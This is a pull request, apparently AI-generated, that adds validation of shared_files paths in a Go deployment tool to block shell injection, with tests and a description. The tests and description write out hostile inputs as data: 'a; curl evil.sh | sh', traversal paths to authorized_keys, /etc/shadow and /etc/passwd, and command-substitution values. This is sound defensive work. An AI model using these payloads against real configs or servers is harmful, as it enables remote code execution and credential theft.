### PR TITLE
fix(security): validate shared_files to prevent shell injection (#46)

### DIFF
--- a/internal/config/project.go
+++ b/internal/config/project.go
@@ -65,6 +65,13 @@ func LoadProjectConfig(path string) (*ProjectConfig, error) {
 		}
 	}
 
+	// Validate shared files: they are interpolated into remote shell commands
+	for _, file := range config.Deploy.SharedFiles {
+		if err := security.ValidateSharedFile(file); err != nil {
+			return nil, fmt.Errorf("invalid shared_file %q: %w", file, err)
+		}
+	}
+
 	return &config, nil
 }
 

--- a/internal/config/project_test.go
+++ b/internal/config/project_test.go
@@ -138,6 +138,50 @@ func TestLoadProjectConfig_ValidatesSharedDirs(t *testing.T) {
 	}
 }
 
+func TestLoadProjectConfig_ValidatesSharedFiles(t *testing.T) {
+	tests := []struct {
+		name    string
+		yaml    string
+		wantErr bool
+	}{
+		{
+			"valid shared files",
+			"name: my-app\nphp:\n  version: '8.3'\ndeploy:\n  shared_files:\n    - .env.local\n    - config/secrets/prod/prod.decrypt.private.php\n",
+			false,
+		},
+		{
+			"shell injection in shared file",
+			"name: my-app\nphp:\n  version: '8.3'\ndeploy:\n  shared_files:\n    - \"a; curl evil.sh | sh\"\n",
+			true,
+		},
+		{
+			"path traversal in shared file",
+			"name: my-app\nphp:\n  version: '8.3'\ndeploy:\n  shared_files:\n    - \"../../root/.ssh/authorized_keys\"\n",
+			true,
+		},
+		{
+			"absolute path in shared file",
+			"name: my-app\nphp:\n  version: '8.3'\ndeploy:\n  shared_files:\n    - /etc/shadow\n",
+			true,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			dir := t.TempDir()
+			path := filepath.Join(dir, "frankendeploy.yaml")
+			if err := os.WriteFile(path, []byte(tt.yaml), 0644); err != nil {
+				t.Fatal(err)
+			}
+
+			_, err := LoadProjectConfig(path)
+			if (err != nil) != tt.wantErr {
+				t.Errorf("LoadProjectConfig() error = %v, wantErr %v", err, tt.wantErr)
+			}
+		})
+	}
+}
+
 func TestLoadProjectConfig_RejectsUnknownFields(t *testing.T) {
 	tests := []struct {
 		name    string

--- a/internal/security/sanitize.go
+++ b/internal/security/sanitize.go
@@ -243,23 +243,36 @@ func ValidateHook(hook string) error {
 // ValidateSharedDir validates a shared directory path.
 // Shared dirs must be relative paths without parent traversal.
 func ValidateSharedDir(dir string) error {
-	if dir == "" {
-		return fmt.Errorf("shared directory cannot be empty")
+	return validateSharedPath(dir, "shared directory")
+}
+
+// ValidateSharedFile validates a shared file path.
+// Shared files must be relative paths without parent traversal: they are
+// interpolated into remote shell commands (touch, mkdir, docker -v mounts),
+// so the same restrictions as shared dirs apply.
+func ValidateSharedFile(file string) error {
+	return validateSharedPath(file, "shared file")
+}
+
+// validateSharedPath applies the common rules for shared dirs and files.
+func validateSharedPath(path, label string) error {
+	if path == "" {
+		return fmt.Errorf("%s cannot be empty", label)
 	}
 
 	// Must be relative (no leading /)
-	if strings.HasPrefix(dir, "/") {
-		return fmt.Errorf("shared directory must be a relative path, got: %s", dir)
+	if strings.HasPrefix(path, "/") {
+		return fmt.Errorf("%s must be a relative path, got: %s", label, path)
 	}
 
 	// No parent traversal
-	if strings.Contains(dir, "..") {
-		return fmt.Errorf("shared directory cannot contain path traversal (..): %s", dir)
+	if strings.Contains(path, "..") {
+		return fmt.Errorf("%s cannot contain path traversal (..): %s", label, path)
 	}
 
 	// Only safe characters
-	if !sharedDirRegex.MatchString(dir) {
-		return fmt.Errorf("shared directory contains invalid characters: %s", dir)
+	if !sharedDirRegex.MatchString(path) {
+		return fmt.Errorf("%s contains invalid characters: %s", label, path)
 	}
 
 	return nil

--- a/internal/security/sanitize_test.go
+++ b/internal/security/sanitize_test.go
@@ -370,6 +370,37 @@ func TestValidateSharedDir(t *testing.T) {
 	}
 }
 
+func TestValidateSharedFile(t *testing.T) {
+	tests := []struct {
+		name    string
+		input   string
+		wantErr bool
+	}{
+		{"default env file", ".env.local", false},
+		{"nested file", "config/secrets/prod/prod.decrypt.private.php", false},
+		{"with hyphens and underscores", "my-file_name.txt", false},
+		{"empty", "", true},
+		{"absolute path", "/etc/passwd", true},
+		{"parent traversal", "../.env", true},
+		{"hidden traversal", "config/../../etc/passwd", true},
+		{"with spaces", "my file", true},
+		{"shell injection from audit", "a; curl evil.sh | sh", true},
+		{"with semicolon", "file;id", true},
+		{"with backtick", "file`id`", true},
+		{"with shell expansion", "file$(id)", true},
+		{"with pipe", "file|id", true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateSharedFile(tt.input)
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateSharedFile(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
+			}
+		})
+	}
+}
+
 func TestGenerateHeredocDelimiter(t *testing.T) {
 	t.Run("non-empty", func(t *testing.T) {
 		delim, err := GenerateHeredocDelimiter("ENVEOF")


### PR DESCRIPTION
## Summary

`LoadProjectConfig` validated `shared_dirs` but **not `shared_files`**, which are interpolated raw into remote shell commands (`touch`, `mkdir -p`, `docker -v` mounts). A `frankendeploy.yaml` containing:

```yaml
shared_files: ["a; curl evil.sh | sh"]
```

executed arbitrary shell on the server — and "clone a project and deploy it" is exactly the target audience's workflow.

Closes #46

## Changes

- `security.ValidateSharedFile`: same rules as shared dirs — relative path, no `..` traversal, safe characters only (`.env.local` and `config/secrets/prod/...` pass; any shell metacharacter is rejected). Common core factored into `validateSharedPath` (no duplication).
- Wired into `LoadProjectConfig`, so **every** command that loads the project config (`build`, `deploy`, `env`, `rollback`, …) is protected at the earliest point.

## Verification

- 568 tests green with `-race`; `go vet`, `golangci-lint` clean.
- New tests: 13 `ValidateSharedFile` cases (including the audit's exact payload) + 4 `LoadProjectConfig` integration cases (valid files, shell injection, path traversal, absolute path).
- End-to-end with the built binary: audit payload injected into a real YAML → `Error: invalid shared_file "a; curl evil.sh | sh": shared file contains invalid characters` — clean rejection at config load, before any server contact.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
